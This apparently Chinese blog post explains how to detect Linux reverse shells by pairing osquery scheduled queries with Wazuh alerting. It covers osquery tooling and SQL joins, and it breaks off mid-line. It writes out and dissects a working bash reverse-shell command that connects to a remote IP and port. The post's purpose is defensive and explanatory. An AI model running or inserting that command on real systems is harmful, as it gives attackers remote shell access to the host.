linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell

用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件,wazuh再对这些日志文件进行解析之后匹配规则告警。

osquery

下载安装的过程就略过了。这里简单介绍下osquery,详细请参考官方文档

文件结构

/etc/osquery/

/usr/share/osquery/osquery.example.conf

/usr/share/osquery/lenses/{*}.aug

/usr/share/osquery/packs/{*}.conf

/var/log/osquery/

/usr/lib/osquery/

/usr/bin/osqueryctl

/usr/bin/osqueryd

/usr/bin/osqueryi

osqueryi

一个修改的后的sqliteshell,可以执行查询语句

.tables,所有表

.schema,显示表结构

pragma table_info(table_name),可视化显示表结构

osqueryd

守护进程,用来定时查询并记录操作系统的更改。

SQL查询

只支持select语句,实际上经常用到多表连接查询join,连接运算是从两个关系的笛卡尔积中选择属性间满足一定条件的元组。

普通join,也是inner join,返回两个表中同时满足条件的元组对,不满足的将被丢弃。

a join b using (id),后面接a,b两张表中都存在的字段 (字段名称一样都是id,而且必须相等)

a JOIN b ON (a.id = b.id),后面接a,b两张表中需要关联的字段 (字段名称不需要一样 a.aid = b.bid,可以指定任意的连接条件(=,>=,<=,!=,>,<...>

LEFT OUTER JOIN,返回左表所有行以及右表满足条件的行,左表有值右表无值填充为null

RIGHT OUTER JOIN,返回右表所有行以及左表满足条件的行,右表有值左表无值填充为null

FULL OUTER JOIN,返回所有表的所有行,在满足条件的行之外,左表满足右表不满足或者相反,均填充null

SELF JOIN,相当于A JOIN A

命令行参数选项

因为可选参数太多,所以放在一个文件里面,--flagfile /etc/osquery/osquery.flags

配置文件

Windows: C:\ProgramData\osquery\osquery.conf

Linux: /etc/osquery/osquery.conf and /etc/osquery/osquery.conf.d/

MacOS: /var/osquery/osquery.conf and /var/osquery/osquery.conf.d/

反弹shell

市面上最常见的bash反弹为例:bash -i >& /dev/tcp/192.168.1.1/8888 0>&1

>&和&>都是表示的是把标准输出1和标准错误2同时重定向到某个文件,相当于>word 2>&1

bash -i >& /dev/tcp/192.168.1.1/8888 等价于

bash -i >/dev/tcp/192.168.1.1/8888 2>&1

bash -i > /dev/tcp/192.168.1.1/8888 0>&1,将bash -i的标准输出1重定向到远端,0>&1代表标准输入0也复制到标准输出1,并且不能简写为>&1,反而0

标准错误2有回显输入命令和终端提示符的作用。

除此之外,还有

nc 192

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux 反弹 shell 是一种攻击技术,攻击者利用漏洞或恶意代码将远程 shell 注入受害者的系统,从而获取对系统的控制权。为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控网络活动:使用网络监控工具,如 tcpdump 或 Wireshark,检查网络流量是否存在异常连接或未知的传出连接。特别关注与反弹 shell 相关的常见端口(如 4444、31337)。 2. 检查系统进程:使用 ps 或 top 命令检查正在运行的进程列表,查找不明确的、不信任的或异常的进程。特别关注与反弹 shell 相关的常见进程名称(如 netcat、nc、socat)。 3. 检查系统文件:使用查找命令(如 find)或相关工具,检查系统文件是否存在未知的、可疑的或异常的文件。特别关注与反弹 shell 相关的常见文件名和路径(如 .bashrc、.bash_profile、.ssh/authorized_keys)。 4. 检查系统日志:查看系统日志文件,如 /var/log/auth.log 或 /var/log/secure,检查是否存在异常登录尝试或认证失败记录,以及与反弹 shell 相关的异常日志。 5. 使用专业工具:使用专门的安全工具,如 LOKI、Lynis、AIDE 等,来扫描系统并检测可能的反弹 shell 活动。这些工具可以自动化检测系统中的恶意活动和异常行为。 请注意,这些方法可以帮助您发现潜在的反弹 shell 活动,但不能保证绝对的安全。建议您定期更新系统、安装最新的安全补丁,并采取其他安全措施来确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值